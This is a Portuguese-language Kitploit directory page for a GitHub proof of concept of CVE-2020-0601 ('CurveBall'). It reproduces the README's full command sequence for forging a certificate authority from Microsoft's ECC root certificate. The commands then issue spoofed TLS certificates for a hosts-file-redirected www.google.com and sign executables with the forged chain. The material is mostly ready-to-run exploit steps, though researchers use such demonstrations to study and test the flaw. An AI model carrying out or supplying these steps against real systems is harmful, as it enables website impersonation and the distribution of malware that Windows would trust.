Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-0601_PoC — Demonstração do CVE-2020-0601, também conhecido como curveball. Baseado nos PoCs disponíveis em https://github.com/kudelskisecurity/chainoffools e https://github.com/ly4k/CurveBall | Kitploit
Ferramentas/GitHubGitHub/joelbts/cve-2020-0601_poc
Análise de VulnerabilidadesAnálise de CódigoExploraçãoSegurança WebCriptografiaTestes de Penetração
GitHubjoelbts/cve-2020-0601_poc

CVE-2020-0601_PoC

Demonstração do CVE-2020-0601, também conhecido como curveball. Baseado nos PoCs disponíveis em https://github.com/kudelskisecurity/chainoffools e https://github.com/ly4k/CurveBall

Ver Repositório
há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Baseado no POC de https://github.com/ly4k/CurveBall

https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/

https://github.com/kudelskisecurity/chainoffools?tab=readme-ov-file


REQUISITOS/SOFTWARE UTILIZADO


python versão 3.11 openssl versão 3.1 osslsigncode versão 2.5 bibliotecas python em gen-key.py httpServer.py


ASSINATURA DE CERTIFICADO TLS


Crie uma chave de CA falsificada a partir do certificado raiz confiável (deve ser secp384r1 e em formato PEM)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

Crie uma CA falsificada usando a chave falsificada

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca.cnf

Crie outro certificado SSL (de qualquer tipo) que será assinado pela CA falsificada

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

Crie uma solicitação de assinatura de certificado para o certificado

openssl req -new -key cert.key -out cert.csr -config openssl.cnf -reqexts v3_req

Assine a CSR usando o certificado da CA falsificada

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl.cnf -extensions v3_req

Inicie um servidor HTTPS com a cadeia de certificados falsificada

python httpServer.py

NA MÁQUINA WINDOWS

Adicione <kali.machine.ip> www.google.com ao arquivo hosts (redireciona o google para o servidor)

visite HTTPS://www.google.com

O certificado deve ser confiável, e 'Hello World' deve ser exibido

Se ocorrer um erro, verifique se a hora do sistema está correta


ASSINATURA DE CÓDIGO


Crie uma chave de CA falsificada a partir do certificado raiz confiável (deve ser secp384r1 e em formato PEM)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

Crie uma CA falsificada usando a chave falsificada

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca-cs.cnf

Crie uma nova chave que possa ser usada para assinatura de código

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

Crie uma solicitação de assinatura de certificado usando a chave, que podemos assinar

openssl req -new -key cert.key -out cert.csr -config openssl-cs.cnf -reqexts v3_req

Assine a CSR usando a CA falsificada

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl-cs.cnf -extensions v3_req

Empacote a chave, o certificado e a CA falsificada em um arquivo PKCS12 para assinar executáveis

openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed-ca.pem -name "Code Signing" -out cert.p12

Use o arquivo PKCS12 para assinar um executável

osslsigncode sign -pkcs12 cert.p12 -n "Signed by curveball" -in filename.exe -out filename_signed.exe

Baixar ferramenta